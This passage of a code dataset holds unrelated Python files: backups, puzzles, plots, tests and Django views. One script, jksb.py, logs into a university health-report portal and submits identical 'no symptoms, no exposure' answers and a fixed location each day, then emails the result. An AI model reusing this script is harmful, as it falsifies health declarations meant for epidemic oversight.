s3_settings, name, query_set_class):\n\n dump_path = dump_db(environment, QuerySet=query_set_class)\n zipf = zipdir(dump_path)\n\n key = generate_uniqueish_key(s3_settings, environment, name)\n\n bytes_written = key.set_contents_from_filename(zipf.filename)\n\n # 4) print out the name of the bucket\n echo(\"Wrote {} bytes to s3\".format(bytes_written))\n\n\ndef s3_restore(key, to_enviornment):\n\n with temp_directory() as temp_dir:\n zip_path = os.path.join(temp_dir, 'MongoDump.zip')\n key.get_contents_to_filename(zip_path)\n local_restore(zip_path, to_enviornment)\n\n\ndef s3_backups(s3_config):\n \"\"\" a dict of key.name: key\n \"\"\"\n bucket = get_s3_bucket(s3_config)\n\n buckets = {}\n for key in bucket.get_all_keys():\n buckets[key.name] = key\n\n return buckets\n","sub_path":"monarch/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"194333164","text":"import random as rd\nimport copy\n\n########### création ou chargement des tableaux #################\n\n\ndef creer_tableau(n):\n \"\"\" créer une liste de liste de taille nxn \"\"\"\n L = [[]for i in range(n-1)]\n L.append([0 for i in range(n-1)])\n L.append([\"*\" for i in range(n+1)])\n L.append([0 for i in range(n)])\n for i in range(n+2):\n if i != n and i != n+1:\n if i == 0:\n L[i].extend([0 for i in range(n-1)])\n elif 1 <= i <= n-2:\n L[i].append(0)\n L[i].extend([rd.randint(5, 9) for i in range(n-2)])\n L[i].extend([0, \"*\", 0])\n L_final = somme(L)\n return L_final\n\n\ndef creer_tableau_2():\n choix = input(\"taper 'nouveau' si vous souhaitez charger un nouveau tableau et taper 'charger' sinon : \")\n if choix == \"charger\":\n nom_fichier = input(\"entrer le nom du fichier (ne pas oublier .txt) : \")\n chargement = open(nom_fichier, \"r\")\n list_chargement = [(line.strip()).split() for line in chargement]\n chargement.close()\n afficher_tableau(list_chargement)\n elif choix == \"nouveau\":\n n = input(\"entrer la taille du tableau (un entier) : \")\n tableau = creer_tableau(int(n))\n afficher_tableau(tableau)\n\n\ndef somme(tab):\n for k in range(len(tab)-2):\n for i in range(len(tab)-2):\n tab[len(tab)-1][k] += tab[i][k]\n tab[k][len(tab)-1] += tab[k][i]\n return tab\n\n\n######### afficher sous forme de tableau ############################\n\n\ndef afficher_tableau(tab):\n \"\"\" affiche la liste de liste sous la forme d'un tableau \"\"\"\n for elem in tab:\n for i in range(len(elem)):\n if i != len(elem)-1:\n if (isinstance(elem[i], int)) and (elem[1] >= 10):\n print(elem[i], end=\" \")\n else:\n print(elem[i], end=\" \")\n else:\n print(elem[i])\n\n\n########## automate des tas de sable version sequentiel ##############\n\n\ndef etape_sequentiel(tab):\n changement = True\n tab_modif = copy.deepcopy(tab)\n\n tab_modif[len(tab)-1].clear()\n tab_modif[len(tab)-1] = [0 for i in range(len(tab)-2)]\n for i in range(len(tab)-3):\n tab_modif[i][len(tab)-1] = 0\n\n for i in range(1, len(tab)-3):\n for k in range(1, len(tab)-3):\n if tab_modif[i][k] >= 4:\n tab_modif[i][k] = tab[i][k] - 4\n tab_modif[i][k-1] += 1\n tab_modif[i][k+1] += 1\n tab_modif[i+1][k] += 1\n tab_modif[i-1][k] += 1\n\n changement = True\n return [tab_modif, changement]\n return [tab, False]\n\n\ndef automate_sequentiel(tab):\n res = etape_sequentiel(tab)\n while res[1]:\n res = etape_sequentiel(res[0])\n res_vrai = somme(res[0])\n return res_vrai\n\n\n####### automate des tas de sable version parallele ##########################\n\n\ndef etape_parallele(tab):\n changement = False\n tab_modif = copy.deepcopy(tab)\n\n tab_modif[len(tab)-1].clear()\n tab_modif[len(tab)-1] = [0 for i in range(len(tab)-2)]\n for i in range(len(tab)-3):\n tab_modif[i][len(tab)-1] = 0\n\n for i in range(1, len(tab)-3):\n for k in range(1, len(tab)-3):\n if tab_modif[i][k] >= 4: \n tab_modif[i][k] = tab_modif[i][k] - 4\n tab_modif[i][k-1] += 1\n tab_modif[i][k+1] += 1\n tab_modif[i+1][k] += 1\n tab_modif[i-1][k] += 1\n\n changement = True\n if changement:\n return [tab_modif, changement]\n else:\n return [tab, changement]\n\ndef automate_parallele1(tab):\n nom_fichier = input(\"entrer le nom du fichier (ne pas oublier .txt) \")\n res = etape_parallele(tab)\n while res[1]:\n res = etape_parallele(res[0])\n res_vrai = somme(res[0])\n Fichier = open(nom_fichier, 'w')\n for elem in res_vrai:\n txt = ' '.join([str(i) for i in elem])\n Fichier.write(txt + '\\n')\n Fichier.close()\n return res[0]\n\n\ndef automate_parallele(tab):\n res = etape_parallele(tab)\n while res[1]:\n res = etape_parallele(res[0])\n res_vrai = somme(res[0])\n return res_vrai\n\n\n############# commandes tests ###################\n\ntest = creer_tableau(4)\nafficher_tableau(test)\nprint(\"------------\")\ntest_para = automate_parallele(test)\nafficher_tableau(test_para)\nprint(\"--------------\")\ntest_seq = automate_sequentiel(test)\nafficher_tableau(test_seq)\n","sub_path":"exercises/in200 exercices/feuille_exos_3_bis.py","file_name":"feuille_exos_3_bis.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"332125791","text":"def solution(arr, m):\n ptr = -1\n while len(arr) > 1:\n for i in range(m):\n ptr += 1\n if ptr >= len(arr): # reach end\n ptr = 0\n\n p_num = arr.pop(ptr)\n print(p_num, arr)\n ptr = ptr - 1\n\n return arr[ptr]\n\n\nprint(solution(list(range(10)), 3))\n","sub_path":"solutions/array/62_Last_Digit_in_Circle.py","file_name":"62_Last_Digit_in_Circle.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"608225837","text":"import logging\nimport os\n\nfrom clowder.tomcat import ConfigurationException,\\\n NotAnInstance\nfrom clowder.tomcat import Instance\n\nclass Finder(object):\n def __init__(self, root=\"/opt/evive/apps/\"): #root=\"/opt/clowder\"):\n self._root = root\n self.logger = logging.getLogger(\"AppFinder\")\n\n def all(self):\n basenames = [x for x in os.listdir(self._root)\n if os.path.isdir(os.path.join(self._root, x))]\n app_instances = filter(lambda x: len(x) == 2, [tuple(x.split(\".\")) for x in basenames])\n apps = {}\n for base in app_instances:\n try:\n app = Instance(name=base[0], instance=base[1], root=self._root)\n apps[base] = app\n except (NotAnInstance,ConfigurationException) as e:\n self.logger.info(\"{message}\".format(message=e.message))\n return apps\n\n def find(self, name, instance=None):\n if instance:\n return {k:v for k,v in self.all().items() if k == (name, instance)}\n else:\n return {k:v for k,v in self.all().items() if k[0] == name}\n","sub_path":"clowder/tomcat/finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"210190451","text":"import unittest\nfrom datetime import date\n\n\nfrom domain.research.factories.research_daily_journal_factory import ResearchDailyJournalFactory\nfrom domain.research.factories.research_factory import GynecologicResearchFactory\nfrom domain.research.repositories.research_daily_journal_repository import ResearchDailyJournalRepository\nfrom usecases.new_research_usecase import NewResearchUseCase\nfrom usecases.utils import ResearchData\n\n\njournal_factory = ResearchDailyJournalFactory()\njournal_repository = ResearchDailyJournalRepository()\ntoday = date(2016, 5, 1)\nresearch_factory = GynecologicResearchFactory()\n\n\nclass TestSaveResearch(unittest.TestCase):\n\n def setUp(self):\n journal = journal_factory.journal(today)\n journal_repository.add_journal(journal)\n\n def test(self):\n expected = research_factory.new_research()\n expected.mark_cell_smear_adequate()\n research_data = ResearchData(\n cell_smear_quality='adequate',\n cell_smear_type='',\n epithelium_surface='',\n epithelium_basal='',\n epithelium_cylindrical='',\n leukocytes='',\n description=''\n )\n journal = journal_repository.find_journal_by_date(today)\n use_case = NewResearchUseCase(journal)\n use_case.execute(research_data)\n\n result = journal.find_by_index(0)\n\n self.assertEqual(expected, result)\n","sub_path":"source/test/test_usecase/test_save_research.py","file_name":"test_save_research.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"103921668","text":"if __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(prog='merge_bxcan.py', description='''\n Merge BrainXcan results from dMRI and T1.\n ''')\n parser.add_argument('--dmri', help='''\n Input S-BrainXcan result for dMRI IDPs.\n ''')\n parser.add_argument('--t1', help='''\n Input S-BrainXcan result for T1 IDPs.\n ''')\n parser.add_argument('--idp_meta_file', help='''\n A meta file for annotating IDPs.\n ''')\n parser.add_argument('--output', help='''\n Output table.\n ''')\n args = parser.parse_args()\n \n import logging, time, sys, os\n # configing util\n logging.basicConfig(\n level = logging.INFO, \n stream = sys.stderr, \n format = '%(asctime)s %(message)s',\n datefmt = '%Y-%m-%d %I:%M:%S %p'\n )\n import pandas as pd\n\n logging.info('Loading S-BrainXcan dMRI.')\n df1 = pd.read_csv(args.dmri)\n df1['modality'] = 'dMRI'\n logging.info('{} IDPs in total.'.format(df1.shape[0]))\n \n logging.info('Loading S-BrainXcan T1.')\n df2 = pd.read_csv(args.t1)\n df2['modality'] = 'T1'\n logging.info('{} IDPs in total.'.format(df2.shape[0]))\n \n logging.info('Loading the IDP meta file.')\n meta = pd.read_csv(args.idp_meta_file)\n \n logging.info('Saving outputs.')\n df = pd.concat([df1, df2], axis=0)\n df = pd.merge(df, meta.drop(columns=['t1_or_dmri', 'ukb_link']), on='IDP', how='left')\n df.fillna('NA', inplace=True)\n df.sort_values(by='pval').to_csv(args.output, index=False)\n \n logging.info('Done.')\n","sub_path":"brainxcan/snmk/merge_bxcan.py","file_name":"merge_bxcan.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"512123369","text":"def solution(weights, head2head):\n \n #인원수 n, 리스트 result, answer 선언\n n= len(weights)\n result,answer=[],[]\n \n #인원수 만큼 반복\n for i in range (n): \n #선수마다 이긴 횟수, 진 횟수 카운트\n win= head2head[i].count('W')\n lose= head2head[i].count('L')\n \n #조건2) 자신보다 무거운 복서를 이긴 횟수 변수 선언\n heavy_win= 0\n \n #win+lose가 0이면 모두 'N'인경우=> 승률 0으로 처리\n if (win+lose) == 0: \n win_rate= 0 \n else:\n #승률 계산\n win_rate= win / (win+lose)\n \n for j in range(n):\n #자기 자신과 싸운 경우인 인덱스는 제외\n if i == j: \n continue\n #이기고 + 자신보다 몸무게가 무거운 복서인 경우 체크\n if head2head[i][j]=='W' and weights[i] < weights[j]:\n heavy_win += 1\n \n #승률, 무거운 선수 이긴 횟수, 몸무게, 선수 번호 순으로 result에 저장\n result.append([-win_rate, -heavy_win, -weights[i],i+1])\n \n #정렬 후 순서대로 선수번호만 answer에 저장해 반환\n result.sort()\n answer = [x[-1] for x in result]\n return answer","sub_path":"6week/6week_kyk.py","file_name":"6week_kyk.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"409589674","text":"import pandas as pd\nimport plotly.offline as pyo\nimport plotly.graph_objs as go\n\n# Load CSSV file from Datasets folder\ndf = pd.read_csv('../Datasets/Weather2014-15.csv')\n\n# Extrapolating the actual max temp per month\nnew_df = df.groupby('month', sort=False).agg(\n {'actual_max_temp': 'max'}).reset_index()\n\n# Preparing data\ndata = [go.Scatter(x=new_df['month'], y=new_df['actual_max_temp'], mode='lines',\n name='Record Max Temperature')]\n\n# Preparing layout\nlayout = go.Layout(title='The Actual Max Temperature of Each Month From 2014 To 2015',\n xaxis_title=\"Month\", yaxis_title=\"Temperature (F)\")\n\n# Plot the figure and saving in a html file\nfig = go.Figure(data=data, layout=layout)\npyo.plot(fig, filename='WeatherLineChart.html')","sub_path":"Plots/WeatherLineChart.py","file_name":"WeatherLineChart.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"122842692","text":"import os\nimport logging\nimport hydra\nfrom solver import main\nfrom omegaconf import OmegaConf, DictConfig\n\nlog = logging.getLogger(__name__)\n\n@hydra.main(config_path=\"conf\", config_name=\"default.yaml\")\ndef run_experiment(cfg: DictConfig) -> None:\n # print(OmegaConf.to_yaml(cfg))\n \n # read params\n p = cfg.solver.penalty\n nV = cfg.solver.num_vehicle\n num_fss = cfg.solver.first_solution_strategy.num_fss\n \n ds, td, tl = main(p, nV, num_fss)\n print(\"Dropped nodes :\", ds)\n print(\"Total distance :\", td)\n print(\"Total load :\", tl)\n\n log.info(\"Dropped nodes :{}\".format(ds))\n log.info(\"Total distance :{}\".format(td))\n log.info(\"Total load :{}\".format(tl))\n\nif __name__ == '__main__':\n run_experiment()","sub_path":"h_experiment.py","file_name":"h_experiment.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"430858855","text":"import re\nimport requests\nimport json #用于读取账号信息\nimport time #用于计时重新发送requests请求\nimport base64 #用于解密编码\nimport logging #用于日志控制\nimport os,sys\nfrom lxml import etree # 可以利用Xpath进行文本解析的库\n# 发送邮件的库\nimport smtplib\nfrom email.mime.text import MIMEText\n\n#账号 密码等信息 Actions部署\nid = os.environ[\"id\"]\npwd = os.environ[\"pwd\"]\n# 邮箱信息\nMAIL_USER = os.environ[\"MAIL_USER\"] #QQ邮箱账户\nMAIL_PWD = os.environ[\"MAIL_PWD\"] #QQ邮箱授权码\nMAIL_TO = os.environ[\"MAIL_TO\"] #QQ邮箱账户\n\n# 本地运行就直接填上相应信息,所有信息需要被双引号\"\"包裹\n# id = \"学号\"\n# pwd = \"密码\"\n# MAIL_USER = \"QQ邮箱账户\"\n# # 这里是授权码--不是账户密码\n# MAIL_PWD = \"邮箱授权码\"\n# MAIL_TO = \"QQ邮箱账户\"\n#账号和密码需要被双引号\"\"包裹\n# eg:\n# id = \"学号\"\n# pwd = \"密码\"\n\ndef sign_in(id, pwd):\n\n curr_dir = os.path.dirname(os.path.abspath(__file__))\n r=\"\"\n\n #set logging format\n LOG_FORMAT = \"%(asctime)s - %(levelname)s - %(message)s\"\n DATE_FORMAT = \"%m/%d/%Y %H:%M:%S %p\"\n #create a log file at the work directory\n\n # 日志文件my.log会保存在该python文件所在目录当中\n logging.basicConfig(filename=curr_dir+'/my.log', level=logging.INFO, format=LOG_FORMAT, datefmt=DATE_FORMAT)\n\n logging.info(\"===开始打卡===\")\n\n #login\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'referer':'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/first0?fun2=a',\n 'Content-Type':'application/x-www-form-urlencoded'\n }\n form={\n \"uid\": id,\n \"upw\": pwd,\n \"smbtn\": \"进入健康状况上报平台\",\n \"hh28\": \"750\" #按照当前浏览器窗口大小计算\n }\n r = \"\"\n max_punch = 10\n curr_punch = 0 #if curr_punch > max_pubch then exit\n logging.info(\"准备进入打卡界面\")\n while True:\n try:\n logging.info(\"准备进入post请求\")\n r= requests.post(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/login\",headers=headers,data=form,timeout=(200,200)) #response为账号密码对应的ptopid和sid信息,timeout=60(sec)\n logging.info(\"成功运行post请求\")\n except:\n logging.warning(\"请检查网络链接是否正常\")\n curr_punch+=1\n if curr_punch>max_punch:\n exit()\n time.sleep(120) #sleep 60 sec\n else:\n break\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n r.close()\n del(r)\n #first6\n matchObj = re.search(r'ptopid=(\\w+)\\&sid=(\\w+)\\\"',text)\n try:\n ptopid = matchObj.group(1)\n sid = matchObj.group(2)\n except:\n logging.warning(\"请检查账号\"+id+\"和密码\"+pwd+\"是否正确,或检查是否有验证码\")\n exit()\n else:\n logging.info(\"账号密码正确\")\n headers= {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'referer':'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/login'\n }\n curr_punch=0\n while True:\n try:\n r = requests.get(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb?ptopid=\"+ptopid+\"&sid=\"+sid+\"&fun2=\") #response里含有jksb对应的params\n except:\n logging.error(\"get请求失败\")\n if curr_punch>max_punch:\n exit()\n curr_punch+=1\n time.sleep(120)\n else:\n break\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n tree=etree.HTML(text)\n nodes = tree.xpath('//*[@id=\"bak_0\"]/div[7]/span')\n # 如果今日填报过就退出填报,直接返回msg\n if nodes[0].text == \"今日您已经填报过了\":\n return nodes[0].text\n r.close()\n del(r)\n #jksb?with_params\n matchObj = re.search(r'ptopid=(\\w+)\\&sid=(\\w+)\\&',text)\n ptopid = matchObj.group(1)\n sid = matchObj.group(2)\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'referer':'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/login'\n }\n curr_punch=0\n while True:\n try:\n r = requests.get(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb?ptopid=\"+ptopid+\"&sid=\"+sid+\"&fun2=\",headers=headers) #response为jksb表单第一页\n except:\n logging.info(\"第二次get请求失败\")\n while curr_punch>max_punch:\n exit()\n curr_punch+=1\n time.sleep(120)\n else:\n break\n ptopid1 = ptopid\n sid1 = sid\n\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n r.close()\n del(r)\n #DONE\n matchObj = re.search(r'name=\\\"ptopid\\\" value=\\\"(\\w+)\\\".+name=\\\"sid\\\" value=\\\"(\\w+)\\\".+',text)\n ptopid = matchObj.group(1)\n sid = matchObj.group(2)\n form = {\n \"day6\": \"b\",\n \"did\": \"1\",\n \"door\": \"\",\n \"men6\": \"a\",\n \"ptopid\": ptopid,\n \"sid\": sid\n }\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Referer': 'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb?ptopid='+ptopid1+'&sid='+sid1+'&fun2=',\n 'Content-Type':'application/x-www-form-urlencoded'\n }\n while True:\n try:\n r = requests.post(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb\",headers=headers,data=form) #response为打卡的第二个表单\n except:\n while curr_punch>max_punch:\n exit()\n curr_punch+=1\n else:\n break\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n r.close()\n del(r)\n #DONE\n matchObj = re.search(r'name=\\\"ptopid\\\" value=\\\"(\\w+)\\\".+name=\\\"sid\\\" value=\\\"(\\w+)\\\"',text)\n ptopid = matchObj.group(1)\n sid = matchObj.group(2)\n form = {\n \"myvs_1\": \"否\",\n \"myvs_2\": \"否\",\n \"myvs_3\": \"否\",\n \"myvs_4\": \"否\",\n \"myvs_5\": \"否\",\n \"myvs_6\": \"否\",\n \"myvs_7\": \"否\",\n \"myvs_8\": \"否\",\n \"myvs_9\": \"否\",\n \"myvs_10\": \"否\",\n \"myvs_11\": \"否\",\n \"myvs_12\": \"否\",\n \"myvs_13\": \"g\",\n \"myvs_13a\": \"41\",\n \"myvs_13b\": \"4101\",\n \"myvs_13c\": \"河南省.郑州市.金水区\",\n \"myvs_24\": \"否\",\n \"myvs_26\": \"2\",\n \"myvs_14b\": \"\", #该选项已弃用\n \"memo22\": \"[待定]\",\n \"did\": \"2\",\n \"door\": \"\",\n \"day6\": \"b\",\n \"men6\": \"a\",\n \"sheng6\": \"\",\n \"shi6\": \"\",\n \"fun3\": \"\",\n \"jingdu\": \"113.64\",\n \"weidu\": \"34.71\",\n \"ptopid\": ptopid,\n \"sid\": sid\n }\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Referer':'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb',\n 'Content-Type':'application/x-www-form-urlencoded'\n }\n while True:\n try:\n r = requests.post(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb\",data=form,headers=headers) #response为完成打卡页面\n except:\n while curr_punch>max_punch:\n exit()\n curr_punch+=1\n else:\n break\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n r.close()\n del(r)\n # 对text文件进行解析\n tree=etree.HTML(text)\n # print(type(tree))\n nodes = tree.xpath('//*[@id=\"bak_0\"]/div[2]/div[2]/div[2]/div[2]')\n for _ in nodes:\n msg = _.text\n if(\"感谢你今日上报健康状况!\" in msg):\n logging.info(id+\":打卡成功\")\n print(id+\":打卡成功\")\n \n else:\n logging.info(id+\":打卡失败\")\n print(id+\":打卡失败\")\n \n return msg\n\n\n\n# 发送邮件的函数\ndef mail(mail_text, mail_to):\n # set the mail context\n msg = MIMEText(mail_text)\n\n # set the mail info\n msg['Subject'] = \"每日健康打卡通知\" #主题\n msg['From'] = MAIL_USER\n msg['To'] = mail_to\n\n # send the mail\n # 发送到QQ邮箱\n send = smtplib.SMTP_SSL(\"smtp.qq.com\", 465)\n send.login(MAIL_USER, MAIL_PWD)\n send.send_message(msg)\n # quit QQ EMail\n send.quit()\n\nif __name__ == '__main__':\n msg = sign_in(id=id, pwd=pwd)\n mail(msg,MAIL_TO)\n\n","sub_path":"jksb.py","file_name":"jksb.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"463085884","text":"class WarpDest():\n ''' Warp Speed: \n One's based GALAXY navigation.\n Guaranteed SAFE placement.\n '''\n def __init__(self, sector=-1, warp=0):\n if sector > 64: sector = 64 # zOuter Limits =)\n if warp > 10: warp = 10\n if warp < 0: warp = 0\n self.warp = warp\n self.sector = sector\n\n @staticmethod\n def parse(dest, sep=','):\n '''\n Parse: sector-num, speed-float - None on error\n Example: 5,1.1 \n '''\n dest = str(dest)\n cols = dest.split(sep)\n if len(cols) == 2:\n try:\n sector = int(cols[0].strip())\n if sector < 1:\n sector = 1\n speed = float(cols[1].strip())\n if speed < 0: speed = 0.1\n if speed > 9: speed = 9.0\n return WarpDest(sector, speed)\n except:\n pass\n return None\n\n\nclass SubDest():\n ''' Sublight Navigation:\n Zero based, AREA placement.\n Caveat, User! ;-)\n '''\n def __init__(self, xpos=-1, ypos=-1):\n if xpos > 7: xpos = 7\n if ypos > 7: ypos = 7\n if xpos < 0: xpos = 0\n if ypos < 0: ypos = 0\n self.xpos = xpos\n self.ypos = ypos\n\n @staticmethod\n def parse(dest, sep=','):\n '''\n WARNING: USER 1's -> 0-BASED TRANSLATION HERE\n\n Parse: [a-h], ypos \n or \n #,# \n Return None on error\n Example: b,5 \n '''\n dest = str(dest)\n cols = dest.split(sep)\n if len(cols) == 2:\n try:\n alph = cols[0].strip().lower()[0]\n num = 0\n if alph.isalpha():\n num = ord(alph) - 96 # 'a' == 1\n else:\n num = int(alph)\n xpos = num\n ypos = int(cols[1].strip()[0])\n return SubDest(xpos-1, ypos-1)\n except:\n pass\n return None\n\n\nclass Dest(WarpDest, SubDest):\n\n def __init__(self):\n WarpDest.__init__(self)\n SubDest.__init__(self)\n\n def is_null(self):\n return self.xpos == 0 and \\\n self.sector == -1\n\n def clone(self):\n result = Dest()\n result.xpos = self.xpos\n result.ypos = self.ypos\n result.sector = self.sector\n result.warp = self.warp\n return result\n\n\nif __name__ == '__main__':\n test = Dest()\n assert(test.is_null() == True)\n test.xpos = test.ypos = 123\n test.sector = 22\n test.warp = 22\n assert(test.is_null() == False)\n clone = test.clone()\n assert(clone.sector == test.sector)\n assert(clone.warp == test.warp)\n assert(clone.xpos == test.xpos)\n assert(clone.ypos == test.ypos)\n\n","sub_path":"Points.py","file_name":"Points.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47746744","text":"#-*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport random\r\nimport datetime\r\nimport os\r\nimport sys\r\nimport socket\r\nimport csv\r\n\r\nfrom django.contrib import auth\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom django.core.paginator import Paginator\r\nfrom django.core.urlresolvers import reverse\r\nfrom django.db.models import Q\r\nfrom django.http.response import HttpResponse, JsonResponse\r\nfrom django.shortcuts import render_to_response, redirect\r\nfrom django.template.context_processors import csrf\r\n\r\nfrom .cleaner import phone_validator\r\nfrom .forms import ClientForm, StatisticSearch, RecordForm, UploadFileForm\r\nfrom .models import Clients, Statistics, Records\r\n\r\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\r\n\r\n\r\n# def originate(request):\r\n# if request.is_ajax():\r\n# id = request.GET['id']\r\n# user = request.user.username\r\n# model_base_name = user + '_base'\r\n# model_base = apps.get_model('inform', model_base_name)\r\n# model_stats_name = user + '_stats'\r\n# model_stats = apps.get_model('inform', model_stats_name)\r\n# client = model_base.objects.get(id=id)\r\n# name = client.name\r\n# phone = client.phone\r\n# record = client.record\r\n# am = Ami()\r\n# am.connect()\r\n# origin = am.originate('9' + phone, record, user)\r\n# am.disconnect()\r\n# if origin['Response'] == 'Success':\r\n# status = 'ANSWER'\r\n# else:\r\n# status = 'NOANSWER'\r\n# time_now = datetime.datetime.now().strftime('%H:%M')\r\n# date_now = datetime.datetime.now().strftime('%Y-%m-%d')\r\n# model_stats.objects.create(name=name, phone=phone, record=record, date=date_now, time=time_now, status=status)\r\n# model_base.objects.get(id=id).delete()\r\n# response_data = {\r\n# 'id': id,\r\n# 'name': name,\r\n# 'phone': phone,\r\n# 'record': record,\r\n# 'date': date_now,\r\n# 'time': time_now,\r\n# 'status': status,\r\n# }\r\n# return JsonResponse(response_data)\r\n\r\n\r\ndef parse_row(row, line, user):\r\n if len(row) is not 3:\r\n return {\r\n 'valid': False,\r\n 'message': u'Строка {}: Неверное количество данных для '\r\n u'загрузки'.format(line)\r\n }\r\n try:\r\n row[0].decode('utf-8')\r\n decoding = 'utf-8'\r\n except UnicodeDecodeError:\r\n decoding = 'cp1251'\r\n client_name = row[0].decode(decoding)\r\n client_phone = row[1].decode(decoding)\r\n client_record = row[2].decode(decoding)\r\n phone = phone_validator(client_phone)\r\n if not phone['valid']:\r\n return {\r\n 'valid': False,\r\n 'message': u'Строка {}: '\r\n u'Неверный формат номера телефона'.format(line)\r\n }\r\n records_list = Records.objects.filter(\r\n user=user\r\n ).values_list('title', flat=True)\r\n if client_record not in records_list:\r\n return {\r\n 'valid': False,\r\n 'message': u'Строка {}: Запись \"{}\" не найдена для текущего '\r\n u'пользователя'.format(line, client_record)\r\n }\r\n record = Records.objects.get(title=client_record)\r\n to_create = Clients(user=user, name=client_name,\r\n phone=client_phone, record=record)\r\n return {'valid': True, 'to_create': to_create}\r\n\r\n\r\ndef index(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n return redirect(reverse('inform:clients'))\r\n else:\r\n return redirect(reverse('inform:login'))\r\n\r\n\r\ndef clients(request):\r\n user = auth.get_user(request)\r\n context = {}\r\n context.update(csrf(request))\r\n message_success = ''\r\n message_error = ''\r\n\r\n if request.POST:\r\n if request.FILES:\r\n file_form = UploadFileForm(request.POST, request.FILES)\r\n if file_form.is_valid():\r\n upload_file = request.FILES['file']\r\n file = str(upload_file).split('.')\r\n file_type = file[-1]\r\n warnings = []\r\n to_create = []\r\n\r\n if file_type == 'txt':\r\n row_reader = upload_file.readlines()\r\n for line, row in enumerate(row_reader, 1):\r\n row = row.rstrip().split(';')\r\n row_valid = parse_row(row, line, user)\r\n if not row_valid['valid']:\r\n warnings.append(row_valid['message'])\r\n continue\r\n to_create.append(row_valid['to_create'])\r\n\r\n elif file_type == 'csv':\r\n row_reader = csv.reader(upload_file, delimiter=';')\r\n for line, row in enumerate(row_reader, 1):\r\n row_valid = parse_row(row, line, user)\r\n if not row_valid['valid']:\r\n warnings.append(row_valid['message'])\r\n continue\r\n to_create.append(row_valid['to_create'])\r\n success = len(to_create)\r\n message_success = u'Добавлено записей: {}'.format(success)\r\n message_warning = u'
'.join(warnings) or ''\r\n try:\r\n Clients.objects.bulk_create(to_create)\r\n except ValueError as e:\r\n message_error = e\r\n message_success = ''\r\n message_warning = ''\r\n context['message_success'] = message_success\r\n context['message_warning'] = message_warning\r\n context['message_error'] = message_error\r\n\r\n else:\r\n client_form = ClientForm(request.POST, user=user)\r\n if client_form.is_valid():\r\n user = user\r\n name = client_form.cleaned_data['name']\r\n phone = client_form.cleaned_data['phone']\r\n record = client_form.cleaned_data['record']\r\n client = Clients.objects.create(\r\n user=user, name=name, phone=phone, record=record)\r\n if client:\r\n context['message_success'] = u'Клиент добавлен в список обзвона'\r\n client_form = ClientForm()\r\n file_form = UploadFileForm()\r\n clients_all = Clients.objects.filter(user=user)\r\n clients_curr = Paginator(clients_all, 10)\r\n page_number = request.GET.get('pn') or 1\r\n context['user'] = user\r\n context['clients'] = clients_curr.page(page_number)\r\n context['client_form'] = client_form\r\n context['file_form'] = file_form\r\n return render_to_response('clients.html', context)\r\n\r\n\r\ndef records(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n context = {}\r\n context.update(csrf(request))\r\n if request.POST:\r\n record_form = RecordForm(request.POST, request.FILES)\r\n if record_form.is_valid():\r\n user = 